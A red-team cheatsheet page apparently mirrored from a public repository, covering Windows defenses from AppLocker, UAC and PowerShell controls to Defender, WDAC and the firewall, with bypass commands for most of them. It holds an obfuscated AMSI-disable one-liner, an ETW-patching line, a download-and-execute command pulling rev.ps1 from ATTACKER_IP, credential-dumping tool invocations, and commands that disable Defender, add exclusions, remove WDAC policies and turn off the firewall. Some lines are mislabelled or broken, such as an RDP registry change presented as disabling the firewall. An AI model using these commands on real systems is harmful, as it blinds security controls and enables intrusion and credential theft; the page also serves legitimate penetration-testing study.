daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

windows-defenses.md (33490B)


      1 ---
      2 title: "Windows - Defenses"
      3 section: "Red Team"
      4 sectionSlug: "redteam"
      5 sourcePath: "docs/redteam/evasion/windows-defenses.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/redteam/evasion/windows-defenses.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Windows - Defenses
     12 
     13 ## Summary
     14 
     15 * [AppLocker](#applocker)
     16 * [User Account Control](#user-account-control)
     17 * [DPAPI](#dpapi)
     18 * [Powershell](#powershell)
     19     * [Execution Policy](#execution-policy)
     20     * [Anti Malware Scan Interface](#anti-malware-scan-interface)
     21     * [Just Enough Administration](#just-enough-administration)
     22     * [Contrained Language Mode](#constrained-language-mode)
     23     * [Script Block and Module Logging](#script-block-and-module-logging)
     24     * [PowerShell Transcript](#powershell-transcript)
     25     * [SecureString](#securestring)
     26 * [Protected Process Light](#protected-process-light)
     27 * [Credential Guard](#credential-guard)
     28 * [Event Tracing for Windows](#event-tracing-for-windows)
     29 * [Attack Surface Reduction](#attack-surface-reduction)
     30 * [Windows Defender Antivirus](#windows-defender-antivirus)
     31 * [Windows Defender Application Control](#windows-defender-application-control)
     32 * [Windows Defender Firewall](#windows-defender-firewall)
     33 * [Windows Information Protection](#windows-information-protection)
     34 
     35 ## AppLocker
     36 
     37 > AppLocker is a security feature in Microsoft Windows that provides administrators with the ability to control which applications and files users are allowed to run on their systems. The rules can be based on various criteria, such as the file path, file publisher, or file hash, and can be applied to specific users or groups.
     38 
     39 * Enumerate Local AppLocker Effective Policy
     40 
     41     ```powershell
     42     PowerView PS C:\> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
     43     PowerView PS C:\> Get-AppLockerPolicy -effective -xml
     44     Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Exe # (Keys: Appx, Dll, Exe, Msi and Script
     45     ```
     46 
     47 * AppLocker Bypass
     48     * By default, `C:\Windows` is not blocked, and `C:\Windows\Tasks` is writtable by any users
     49     * [api0cradle/UltimateAppLockerByPassList/Generic-AppLockerbypasses.md](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md)
     50     * [api0cradle/UltimateAppLockerByPassList/VerifiedAppLockerBypasses.md](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/VerifiedAppLockerBypasses.md)
     51     * [api0cradle/UltimateAppLockerByPassList/DLL-Execution.md](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/DLL-Execution.md)
     52     * [api0cradle/AccessChk.bat](https://gist.github.com/api0cradle/95cd51fa1aa735d9331186f934df4df9)
     53 
     54 ## User Account Control
     55 
     56 UAC stands for User Account Control. It is a security feature introduced by Microsoft in Windows Vista and is present in all subsequent versions of the Windows operating system. UAC helps mitigate the impact of malware and helps protect users by asking for permission or an administrator's password before allowing changes to be made to the system that could potentially affect all users of the computer.
     57 
     58 * Check if UAC is enabled
     59 
     60     ```ps1
     61     REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
     62     ```
     63 
     64 * Check UAC level
     65 
     66     ```ps1
     67     REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin
     68     REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v FilterAdministratorToken
     69     ```
     70 
     71 | EnableLUA | LocalAccountTokenFilterPolicy | FilterAdministratorToken | Description        |
     72 | --------- | ----------------------------- | ------------------------ | ------------------ |
     73 | 0         | /                             | /                        | No UAC             |
     74 | 1         | 1                             | /                        | No UAC             |
     75 | 1         | 0                             | 0                        | No UAC for RID 500 |
     76 | 1         | 0                             | 1                        | UAC for Everyone   |
     77 
     78 * UAC Bypass
     79     * [AutoElevated binary signed by Microsoft](https://www.elastic.co/guide/en/security/current/bypass-uac-via-sdclt.html) - `msconfig`, `sdclt.exe`, `eventvwr.exe`, etc
     80     * [hfiref0x/UACME](https://github.com/hfiref0x/UACME) - Defeating Windows User Account Control
     81     * Find process that auto elevate:
     82 
     83         ```ps1
     84         strings.exe -s *.exe | findstr /I "<autoElevate>true</autoElevate>"
     85         ```
     86 
     87 ## DPAPI
     88 
     89 Refer to [InternalAllTheThings/Windows - DPAPI.md](/internal/redteam/evasion/windows-dpapi)
     90 
     91 ## Powershell
     92 
     93 ### Execution Policy
     94 
     95 > PowerShell Execution Policy is a security feature that controls how scripts run on a system. It helps prevent unauthorized scripts from executing, but it is not a security boundary—it only prevents accidental execution of unsigned scripts.
     96 
     97 * Check current policy
     98 
     99     ```ps1
    100     Get-ExecutionPolicy
    101     ```
    102 
    103 | Policy       | Description                                       |
    104 | ------------ | ------------------------------------------------- |
    105 | Restricted   | No scripts allowed (default in some systems).     |
    106 | AllSigned    | Only runs signed scripts.                         |
    107 | RemoteSigned | Local scripts run, remote scripts must be signed. |
    108 | Unrestricted | Runs all scripts, warns for remote scripts.       |
    109 | Bypass       | No restrictions; all scripts run.                 |
    110 
    111 * `Restricted`: it prevents the execution of all scripts (the default for workstations).
    112 * `RemoteSigned`: it blocks the execution of unsigned scripts downloaded from the Internet, but allows the execution of "local" scripts (the default on servers). The command `Unblock-File` can be used to remove the Mark-of-the-Web (MotW) and make a downloaded script look like a "local" script.
    113 
    114     ```ps1
    115     # Bypass
    116     Unblock-File my-file-from-internet
    117     ```
    118 
    119 * `AllSigned`: it blocks unsigned scripts. This is the most secure option.
    120 
    121     ```ps1
    122     # Bypass
    123     Get-Content .\run.ps1 | Invoke-Expression
    124     ```
    125 
    126 You can just run `powershell.exe` with the option `-ep Bypass`, or use the built-in command `Set-ExecutionPolicy`.
    127 
    128 ```ps1
    129 powershell -ep bypass
    130 Set-ExecutionPolicy Bypass -Scope Process -Force
    131 ```
    132 
    133 ### Anti Malware Scan Interface
    134 
    135 > The Anti-Malware Scan Interface (AMSI) is a Windows API (Application Programming Interface) that provides a unified interface for applications and services to integrate with any anti-malware product installed on a system. The API allows anti-malware solutions to scan files and scripts at runtime, and provides a means for applications to request a scan of specific content.
    136 
    137 Find more AMSI bypass: [Windows - AMSI Bypass.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20AMSI%20Bypass.md)
    138 
    139 ```powershell
    140 PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
    141 ```
    142 
    143 ### Just Enough Administration
    144 
    145 > Just-Enough-Administration (JEA) is a feature in Microsoft Windows Server that allows administrators to delegate specific administrative tasks to non-administrative users. JEA provides a secure and controlled way to grant limited, just-enough access to systems, while ensuring that the user cannot perform unintended actions or access sensitive information.
    146 
    147 Breaking out if JEA:
    148 
    149 * List available cmdlets: `command`
    150 * Look for non-default cmdlets:
    151 
    152     ```ps1
    153     Set-PSSessionConfiguration
    154     Start-Process
    155     New-Service
    156     Add-Computer
    157     ```
    158 
    159 ### Constrained Language Mode
    160 
    161 Check if we are in a constrained mode: `$ExecutionContext.SessionState.LanguageMode`
    162 
    163 * Bypass using an old Powershell. Powershell v2 doesn't support CLM.
    164 
    165     ```ps1
    166     powershell.exe -version 2
    167     powershell.exe -version 2 -ExecutionPolicy bypass
    168     powershell.exe -v 2 -ep bypass -command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/rev.ps1')"
    169     ```
    170 
    171 * Bypass when `__PSLockDownPolicy` is used. Just put "System32" somewhere in the path.
    172 
    173     ```ps1
    174     # Enable CLM from the environment
    175     [Environment]::SetEnvironmentVariable('__PSLockdownPolicy', '4', 'Machine')
    176     Get-ChildItem -Path Env:
    177 
    178     # Create a check-mode.ps1 containing your "evil" powershell commands
    179     $mode = $ExecutionContext.SessionState.LanguageMode
    180     write-host $mode
    181 
    182     # Simple bypass, execute inside a System32 folder
    183     PS C:\> C:\Users\Public\check-mode.ps1
    184     ConstrainedLanguage
    185 
    186     PS C:\> C:\Users\Public\System32\check-mode.ps1
    187     FullLanguagge
    188     ```
    189 
    190 * Bypass using COM: [xpn/COM_to_registry.ps1](https://gist.githubusercontent.com/xpn/1e9e879fab3e9ebfd236f5e4fdcfb7f1/raw/ceb39a9d5b0402f98e8d3d9723b0bd19a84ac23e/COM_to_registry.ps1)
    191 * Bypass using your own Powershell DLL: [p3nt4/PowerShdll](https://github.com/p3nt4/PowerShdll) & [iomoath/PowerShx](https://github.com/iomoath/PowerShx)
    192 
    193     ```ps1
    194     rundll32 PowerShdll,main <script>
    195     rundll32 PowerShdll,main -h      Display this message
    196     rundll32 PowerShdll,main -f <path>       Run the script passed as argument
    197     rundll32 PowerShdll,main -w      Start an interactive console in a new window (Default)
    198     rundll32 PowerShdll,main -i      Start an interactive console in this console
    199 
    200     rundll32 PowerShx.dll,main -e                           <PS script to run>
    201     rundll32 PowerShx.dll,main -f <path>                    Run the script passed as argument
    202     rundll32 PowerShx.dll,main -f <path> -c <PS Cmdlet>     Load a script and run a PS cmdlet
    203     rundll32 PowerShx.dll,main -w                           Start an interactive console in a new window
    204     rundll32 PowerShx.dll,main -i                           Start an interactive console
    205     rundll32 PowerShx.dll,main -s                           Attempt to bypass AMSI
    206     rundll32 PowerShx.dll,main -v                           Print Execution Output to the console
    207     ```
    208 
    209 ### Script Block and Module Logging
    210 
    211 > Once Script Block Logging is enabled, the script blocks and commands that are executed will be recorded in the Windows event log under the "Windows PowerShell" channel. To view the logs, administrators can use the Event Viewer application and navigate to the "Windows PowerShell" channel.
    212 
    213 Enable Script Block Logging:
    214 
    215 ```ps1
    216 function Enable-PSScriptBlockLogging
    217 {
    218     $basePath = 'HKLM:\Software\Policies\Microsoft\Windows' +
    219       '\PowerShell\ScriptBlockLogging'
    220 
    221     if(-not (Test-Path $basePath))
    222     {
    223         $null = New-Item $basePath -Force
    224     }
    225 
    226     Set-ItemProperty $basePath -Name EnableScriptBlockLogging -Value "1"
    227 }
    228 ```
    229 
    230 Disable ETW of the current PowerShell session with [tandasat/KillETW.ps1](https://gist.github.com/tandasat/e595c77c52e13aaee60e1e8b65d2ba32):
    231 
    232 ```ps1
    233 # This PowerShell command sets 0 to System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled which effectively disables Suspicious ScriptBlock Logging etc.
    234 [Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)
    235 ```
    236 
    237 ### PowerShell Transcript
    238 
    239 PowerShell Transcript is a logging feature that records all commands and output from a PowerShell session. It helps with auditing, debugging, and troubleshooting by saving session activity to a text file.
    240 
    241 Start a transcript and store the output in a custom file.
    242 
    243 ```ps1
    244 Start-Transcript -Path "C:\transcripts\transcript0.txt" -NoClobber
    245 ```
    246 
    247 Common locations for PowerShell transcripts outputs:
    248 
    249 ```ps1
    250 C:\Users\<USERNAME>\Documents\PowerShell_transcript.<HOSTNAME>.<RANDOM>.<TIMESTAMP>.txt
    251 C:\Transcripts\<DATE>\PowerShell_transcript.<HOSTNAME>.<RANDOM>.<TIMESTAMP>.txt
    252 ```
    253 
    254 ### SecureString
    255 
    256 A `SecureString` in PowerShell is a data type designed to store sensitive information like passwords or confidential data in a more secure manner than a plain string. Unlike a regular string, which stores data in plain text and can be easily accessed in memory, a `SecureString` encrypts the data in memory, providing better protection against unauthorized access.
    257 
    258 Convert to SecureString
    259 
    260 ```ps1
    261 $original = 'myPassword'  
    262 $secureString = ConvertTo-SecureString $original -AsPlainText -Force
    263 $secureStringValue = ConvertFrom-SecureString $secureString
    264 ```
    265 
    266 Get the original content
    267 
    268 ```ps1
    269 $secureStringBack = $secureStringValue | ConvertTo-SecureString
    270 $bstr = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($secureStringBack);
    271 $finalValue = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($bstr)
    272 ```
    273 
    274 When a `SecureString` is created, the plain text characters are encrypted immediately using the Data Protection API (**DPAPI**)
    275 
    276 Using the AES key
    277 
    278 ```ps1
    279 [Byte[]] $key = (49,222,...,87,159)
    280 $pass = (echo "AA...AA=" | ConvertTo-SecureString -Key $key)
    281 [Runtime.InteropServices.Marshal]::PtrToStringAuto([Runtime.InteropServices.Marshal]::SecureStringToBSTR($pass))
    282 ```
    283 
    284 ## Protected Process Light
    285 
    286 Protected Process Light (PPL) is implemented as a Windows security mechanism that enables processes to be marked as "protected" and run in a secure, isolated environment, where they are shielded from attacks by malware or other unauthorized processes. PPL is used to protect processes that are critical to the operation of the operating system, such as anti-virus software, firewalls, and other security-related processes.
    287 
    288 When a process is marked as "protected" using PPL, it is assigned a security level that determines the level of protection it will receive. This security level can be set to one of several levels, ranging from low to high. Processes that are assigned a higher security level are given more protection than those that are assigned a lower security level.
    289 
    290 A process's protection is defined by a combination of the "level" and the "signer". The following table represent commonly used combinations, from [itm4n.github.io](https://itm4n.github.io/lsass-runasppl/).
    291 
    292 | Protection level                | Value | Signer           | Type                |
    293 | ------------------------------- | ----- | ---------------- | ------------------- |
    294 | PS_PROTECTED_SYSTEM             | 0x72  | WinSystem (7)    | Protected (2)       |
    295 | PS_PROTECTED_WINTCB             | 0x62  | WinTcb (6)       | Protected (2)       |
    296 | PS_PROTECTED_WINDOWS            | 0x52  | Windows (5)      | Protected (2)       |
    297 | PS_PROTECTED_AUTHENTICODE       | 0x12  | Authenticode (1) | Protected (2)       |
    298 | PS_PROTECTED_WINTCB_LIGHT       | 0x61  | WinTcb (6)       | Protected Light (1) |
    299 | PS_PROTECTED_WINDOWS_LIGHT      | 0x51  | Windows (5)      | Protected Light (1) |
    300 | PS_PROTECTED_LSA_LIGHT          | 0x41  | Lsa (4)          | Protected Light (1) |
    301 | PS_PROTECTED_ANTIMALWARE_LIGHT  | 0x31  | Antimalware (3)  | Protected Light (1) |
    302 | PS_PROTECTED_AUTHENTICODE_LIGHT | 0x11  | Authenticode (1) | Protected Light (1) |
    303 
    304 PPL works by restricting access to the protected process's memory and system resources, and by preventing the process from being modified or terminated by other processes or users. The process is also isolated from other processes running on the system, which helps prevent attacks that attempt to exploit shared resources or dependencies.
    305 
    306 * Check if LSASS is running in PPL
    307 
    308     ```ps1
    309     reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL
    310     ```
    311 
    312 * Protected process example: you can't kill Microsoft Defender even with Administrator privilege.
    313 
    314     ```ps1
    315     taskkill /f /im MsMpEng.exe
    316     ERROR: The process "MsMpEng.exe" with PID 5784 could not be terminated.
    317     Reason: Access is denied.
    318     ```
    319 
    320 * Can be disabled using vulnerable drivers (Bring Your Own Vulnerable Driver / BYOVD)
    321 
    322 ## Credential Guard
    323 
    324 When Credential Guard is enabled, it uses hardware-based virtualization to create a secure environment that is separate from the operating system. This secure environment is used to store sensitive credential information, which is encrypted and protected from unauthorized access.
    325 
    326 Credential Guard uses a combination of hardware-based virtualization and the Trusted Platform Module (TPM) to ensure that the secure kernel is trusted and secure. It can be enabled on devices that have a compatible processor and TPM version, and require a UEFI firmware that supports the necessary features.
    327 
    328 * [bytewreck/DumpGuard](https://github.com/bytewreck/DumpGuard) - Proof-of-Concept tool for extracting NTLMv1 hashes from sessions on modern Windows systems.
    329 * [EvanMcBroom/lsa-whisperer](https://github.com/EvanMcBroom/lsa-whisperer) - Tools for interacting with authentication packages using their individual message protocols.
    330 
    331 | Technique                                                       | Requires<br>SYSTEM | Requires<br>SPN Account | Can Dump<br>Credential Guard |
    332 | --------------------------------------------------------------- | :----------------: | :---------------------: | :--------------------------: |
    333 | Extract own credentials via Remote Credential Guard protocol    | :x:                | ✅                      | ✅                           |
    334 | Extract all credentials via Remote Credential Guard protocol    | ✅                 | ✅                      | ✅                           |
    335 | Extract all credentials via Microsoft v1 authentication package | ✅                 | :x:                     | :x:                          |
    336 
    337 * **Dumping own session using Remote Credential Guard**: this works regardless of the state of Credential Guard, but requires credentials for an SPN-enabled account.
    338 
    339     ```ps1
    340     DumpGuard.exe /mode:self /domain:<DOMAIN> /username:<SAMACCOUNTNAME> /password:<PASSWORD> [/spn:<SPN>]
    341     ```
    342 
    343 * **Dumping all sessions using Remote Credential Guard**: this works regardless of the state of Credential Guard, but requires credentials for an SPN-enabled account and `SYSTEM` privileges.
    344 
    345     ```ps1
    346     DumpGuard.exe /mode:all /domain:<DOMAIN> /username:<SAMACCOUNTNAME> /password:<PASSWORD> [/spn:<SPN>]
    347     ```
    348 
    349 * **Dumping all sessions using Microsoft v1 authentication package**
    350     * Credential Guard is disabled on the local system.
    351     * Remote users are authenticated to the local system from a remote host over Remote Credential Guard.
    352 
    353     ```ps1
    354     DumpGuard.exe /mode:all
    355     # or
    356     lsa-whisperer.exe msv1_0 Lm20GetChallengeResponse --luid {session id} --challenge {challenge to clients} [flags...]
    357     ```
    358 
    359 ## Event Tracing for Windows
    360 
    361 ETW (Event Tracing for Windows) is a Windows-based logging mechanism that provides a way to collect and analyze system events and performance data in real-time. ETW allows developers and system administrators to gather detailed information about system performance and behavior, which can be used for troubleshooting, optimization, and security purposes.
    362 
    363 | Name                                  | GUID                                   |
    364 |---------------------------------------|----------------------------------------|
    365 | Microsoft-Antimalware-Scan-Interface  | {2A576B87-09A7-520E-C21A-4942F0271D67} |
    366 | Microsoft-Windows-PowerShell          | {A0C1853B-5C40-4B15-8766-3CF1C58F985A} |
    367 | Microsoft-Antimalware-Protection      | {E4B70372-261F-4C54-8FA6-A5A7914D73DA} |
    368 | Microsoft-Windows-Threat-Intelligence | {F4E1897C-BB5D-5668-F1D8-040F4D8DD344} |
    369 
    370 You can see all the providers registered to Windows using: `logman query providers`
    371 
    372 ```ps1
    373 PS C:\Users\User\Documents> logman query providers
    374 
    375 Provider                                 GUID
    376 -------------------------------------------------------------------------------
    377 .NET Common Language Runtime             {E13C0D23-CCBC-4E12-931B-D9CC2EEE27E4}
    378 ACPI Driver Trace Provider               {DAB01D4D-2D48-477D-B1C3-DAAD0CE6F06B}
    379 Active Directory Domain Services: SAM    {8E598056-8993-11D2-819E-0000F875A064}
    380 Active Directory: Kerberos Client        {BBA3ADD2-C229-4CDB-AE2B-57EB6966B0C4}
    381 Active Directory: NetLogon               {F33959B4-DBEC-11D2-895B-00C04F79AB69}
    382 ADODB.1                                  {04C8A86F-3369-12F8-4769-24E484A9E725}
    383 ADOMD.1                                  {7EA56435-3F2F-3F63-A829-F0B35B5CAD41}
    384 ...
    385 ```
    386 
    387 We can get more information about the provider using:  `logman query providers {ProviderID}/Provider-Name`
    388 
    389 ```ps1
    390 PS C:\Users\User\Documents> logman query providers Microsoft-Antimalware-Scan-Interface
    391 
    392 Provider                                 GUID
    393 -------------------------------------------------------------------------------
    394 Microsoft-Antimalware-Scan-Interface     {2A576B87-09A7-520E-C21A-4942F0271D67}
    395 
    396 Value               Keyword              Description
    397 -------------------------------------------------------------------------------
    398 0x0000000000000001  Event1
    399 0x8000000000000000  AMSI/Debug
    400 
    401 Value               Level                Description
    402 -------------------------------------------------------------------------------
    403 0x04                win:Informational    Information
    404 
    405 PID                 Image
    406 -------------------------------------------------------------------------------
    407 0x00002084          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    408 0x00002084          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    409 0x00001bd4
    410 0x00000ad0
    411 0x00000b98
    412 ```
    413 
    414 The `Microsoft-Windows-Threat-Intelligence` provider corresponds to ETWTI, an additional security feature that an EDR can subscribe to and identify malicious uses of APIs (e.g. process injection).
    415 
    416 ```ps1
    417 0x0000000000000001  KERNEL_THREATINT_KEYWORD_ALLOCVM_LOCAL
    418 0x0000000000000002  KERNEL_THREATINT_KEYWORD_ALLOCVM_LOCAL_KERNEL_CALLER
    419 0x0000000000000004  KERNEL_THREATINT_KEYWORD_ALLOCVM_REMOTE
    420 0x0000000000000008  KERNEL_THREATINT_KEYWORD_ALLOCVM_REMOTE_KERNEL_CALLER
    421 0x0000000000000010  KERNEL_THREATINT_KEYWORD_PROTECTVM_LOCAL
    422 0x0000000000000020  KERNEL_THREATINT_KEYWORD_PROTECTVM_LOCAL_KERNEL_CALLER
    423 0x0000000000000040  KERNEL_THREATINT_KEYWORD_PROTECTVM_REMOTE
    424 0x0000000000000080  KERNEL_THREATINT_KEYWORD_PROTECTVM_REMOTE_KERNEL_CALLER
    425 0x0000000000000100  KERNEL_THREATINT_KEYWORD_MAPVIEW_LOCAL
    426 0x0000000000000200  KERNEL_THREATINT_KEYWORD_MAPVIEW_LOCAL_KERNEL_CALLER
    427 0x0000000000000400  KERNEL_THREATINT_KEYWORD_MAPVIEW_REMOTE
    428 0x0000000000000800  KERNEL_THREATINT_KEYWORD_MAPVIEW_REMOTE_KERNEL_CALLER
    429 0x0000000000001000  KERNEL_THREATINT_KEYWORD_QUEUEUSERAPC_REMOTE
    430 0x0000000000002000  KERNEL_THREATINT_KEYWORD_QUEUEUSERAPC_REMOTE_KERNEL_CALLER
    431 0x0000000000004000  KERNEL_THREATINT_KEYWORD_SETTHREADCONTEXT_REMOTE
    432 0x0000000000008000  KERNEL_THREATINT_KEYWORD_SETTHREADCONTEXT_REMOTE_KERNEL_CALLER
    433 0x0000000000010000  KERNEL_THREATINT_KEYWORD_READVM_LOCAL
    434 0x0000000000020000  KERNEL_THREATINT_KEYWORD_READVM_REMOTE
    435 0x0000000000040000  KERNEL_THREATINT_KEYWORD_WRITEVM_LOCAL
    436 0x0000000000080000  KERNEL_THREATINT_KEYWORD_WRITEVM_REMOTE
    437 0x0000000000100000  KERNEL_THREATINT_KEYWORD_SUSPEND_THREAD
    438 0x0000000000200000  KERNEL_THREATINT_KEYWORD_RESUME_THREAD
    439 0x0000000000400000  KERNEL_THREATINT_KEYWORD_SUSPEND_PROCESS
    440 0x0000000000800000  KERNEL_THREATINT_KEYWORD_RESUME_PROCESS
    441 ```
    442 
    443 The most common bypassing technique is patching the function `EtwEventWrite` which is called to write/log ETW events. You can list the providers registered for a process with `logman query providers -pid <PID>`
    444 
    445 ## Attack Surface Reduction
    446 
    447 > Attack Surface Reduction (ASR) refers to strategies and techniques used to decrease the potential points of entry that attackers could use to exploit a system or network.
    448 
    449 ```ps1
    450 Add-MpPreference -AttackSurfaceReductionRules_Ids <Id> -AttackSurfaceReductionRules_Actions AuditMode
    451 Add-MpPreference -AttackSurfaceReductionRules_Ids <Id> -AttackSurfaceReductionRules_Actions Enabled
    452 ```
    453 
    454 | Description                                                                               | Id                                   |
    455 | ----------------------------------------------------------------------------------------- | ------------------------------------ |
    456 | Block execution of potentially obfuscated scripts                                         | 5beb7efe-fd9a-4556-801d-275e5ffc04cc |
    457 | Block JavaScript or VBScript from launching downloaded executable content                 | d3e037e1-3eb8-44c8-a917-57927947596d |
    458 | Block abuse of exploited vulnerable signed drivers                                        | 56a863a9-875e-4185-98a7-b882c64b5ce5 |
    459 | Block executable content from email client and webmail                                    | be9ba2d9-53ea-4cdc-84e5-9b1eeee46550 |
    460 | Block process creations originating from PSExec and WMI commands                          | d1e49aac-8f56-4280-b9ba-993a6d77406c |
    461 | Use advanced protection against ransomware                                                | c1db55ab-c21a-4637-bb3f-a12568109d35 |
    462 | Block credential stealing from the Windows local security authority subsystem (lsass.exe) | 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 |
    463 
    464 ## Windows Defender Antivirus
    465 
    466 Also known as `Microsoft Defender`.
    467 
    468 * Check status of Defender
    469 
    470     ```powershell
    471     PS C:\> Get-MpComputerStatus
    472     ```
    473 
    474 * Disable scanning all downloaded files and attachments
    475 
    476     ```powershell
    477     PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
    478     PS C:\> Set-MpPreference -DisableIOAVProtection $true
    479     ```
    480 
    481 * Disable AMSI (set to 0 to enable)
    482 
    483     ```powershell
    484     PS C:\> Set-MpPreference -DisableScriptScanning 1 
    485     ```
    486 
    487 * Exclude a folder, a process from scanning
    488 
    489     ```powershell
    490     PS C:\> Add-MpPreference -ExclusionPath "C:\Temp"
    491     PS C:\> Add-MpPreference -ExclusionPath "C:\Windows\Tasks"
    492     PS C:\> Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe"
    493     ```
    494 
    495 * Exclude a folder using WMI
    496 
    497     ```powershell
    498     PS C:\> WMIC /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath="C:\Users\Public\wmic"
    499     ```
    500 
    501 * Remove signatures. **NOTE**: if Internet connection is present, they will be downloaded again.
    502 
    503     ```powershell
    504     PS > & "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All
    505     PS > & "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
    506     ```
    507 
    508 Identify the exact bytes that are detected by Windows Defender Antivirus
    509 
    510 * [matterpreter/DefenderCheck](https://github.com/matterpreter/DefenderCheck) - Identifies the bytes that Microsoft Defender flags on
    511 * [gatariee/gocheck](https://github.com/gatariee/gocheck) - DefenderCheck but blazingly fast™
    512 
    513 ## Windows Defender Application Control
    514 
    515 Also known as `WDAC/UMCI/Device Guard`.
    516 
    517 > Windows Defender Application Guard, formerly known as Device Guard has the power to control if an application may or may not be executed on a Windows device. WDAC will prevent the execution, running, and loading of unwanted or malicious code, drivers, and scripts. WDAC does not trust any software it does not know of.
    518 
    519 * Get WDAC current mode
    520 
    521     ```ps1
    522     $ Get-ComputerInfo
    523     DeviceGuardCodeIntegrityPolicyEnforcementStatus         : EnforcementMode
    524     DeviceGuardUserModeCodeIntegrityPolicyEnforcementStatus : EnforcementMode
    525     ```
    526 
    527 * Remove WDAC policies using CiTool.exe (Windows 11 2022 Update)
    528 
    529     ```ps1
    530     CiTool.exe -rp "{PolicyId GUID}" -json
    531     ```
    532 
    533 * Device Guard policy location: `C:\Windows\System32\CodeIntegrity\CiPolicies\Active\{PolicyId GUID}.cip`
    534 * Device Guard example policies: `C:\Windows\System32\CodeIntegrity\ExamplePolicies\`
    535 * WDAC utilities: [mattifestation/WDACTools](https://github.com/mattifestation/WDACTools), a PowerShell module to facilitate building, configuring, deploying, and auditing Windows Defender Application Control (WDAC) policies
    536 * WDAC bypass techniques: [bohops/UltimateWDACBypassList](https://github.com/bohops/UltimateWDACBypassList)
    537     * [nettitude/Aladdin](https://github.com/nettitude/Aladdin) - WDAC Bypass using AddInProcess.exe
    538 
    539 ## Windows Defender Firewall
    540 
    541 * List firewall state and current configuration
    542 
    543     ```powershell
    544     netsh advfirewall firewall dump
    545     # or 
    546     netsh firewall show state
    547     netsh firewall show config
    548     ```
    549 
    550 * List firewall's blocked ports
    551 
    552     ```powershell
    553     $f=New-object -comObject HNetCfg.FwPolicy2;$f.rules |  where {$_.action -eq "0"} | select name,applicationname,localports
    554     ```
    555 
    556 * Disable firewall
    557 
    558     ```powershell
    559     # Disable Firewall via cmd
    560     reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"  /v fDenyTSConnections /t REG_DWORD /d 0 /f
    561 
    562     # Disable Firewall via Powershell
    563     powershell.exe -ExecutionPolicy Bypass -command 'Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" –Value'`
    564 
    565     # Disable Firewall on any windows using native command
    566     netsh firewall set opmode disable
    567     netsh Advfirewall set allprofiles state off
    568     ```
    569 
    570 ## Windows Information Protection
    571 
    572 Windows Information Protection (WIP), formerly known as Enterprise Data Protection (EDP), is a security feature in Windows 10 that helps protect sensitive data on enterprise devices. WIP helps to prevent accidental data leakage by allowing administrators to define policies that control how enterprise data can be accessed, shared, and protected. WIP works by identifying and separating enterprise data from personal data on the device.
    573 
    574 Protection of file (data) locally marked as corporate is facilitated via Encrypting File System (EFS) encryption of Windows (a feature of NTFS file system)
    575 
    576 * Enumerate files attributes, `Encrypted` attribute is used for files protected by WIP
    577 
    578     ```ps1
    579     PS C:\> (Get-Item -Path 'C:\...').attributes
    580     Archive, Encrypted
    581     ```
    582 
    583 * Encrypt files: `cipher /c encryptedfile.extension`
    584 * Decrypt files: `cipher /d encryptedfile.extension`
    585 
    586 The **Enterprise Context** column shows you what each app can do with your enterprise data:
    587 
    588 * **Domain**. Shows the employee's work domain (such as, corp.contoso.com). This app is considered work-related and can freely touch and open work data and resources.
    589 * **Personal**. Shows the text, Personal. This app is considered non-work-related and can't touch any work data or resources.
    590 * **Exempt**. Shows the text, Exempt. Windows Information Protection policies don't apply to these apps (such as, system components).
    591 
    592 ## BitLocker Drive Encryption
    593 
    594 BitLocker is a full-disk encryption feature included in Microsoft Windows operating systems starting with Windows Vista. It is designed to protect data by providing encryption for entire volumes. BitLocker uses AES encryption algorithm to encrypt data on the disk. When enabled, BitLocker requires a user to enter a password or insert a USB flash drive to unlock the encrypted volume before the operating system is loaded, ensuring that data on the disk is protected from unauthorized access. BitLocker is commonly used on laptops, portable storage devices, and other mobile devices to protect sensitive data in case of theft or loss.
    595 
    596 When BitLocker is in `Suspended` state, boot the system using a Windows Setup USB, and then decrypt the drive using this command: `manage-bde -off c:`
    597 
    598 You can check if it is done decrypting using this command: `manage-bde -status`
    599 
    600 ## References
    601 
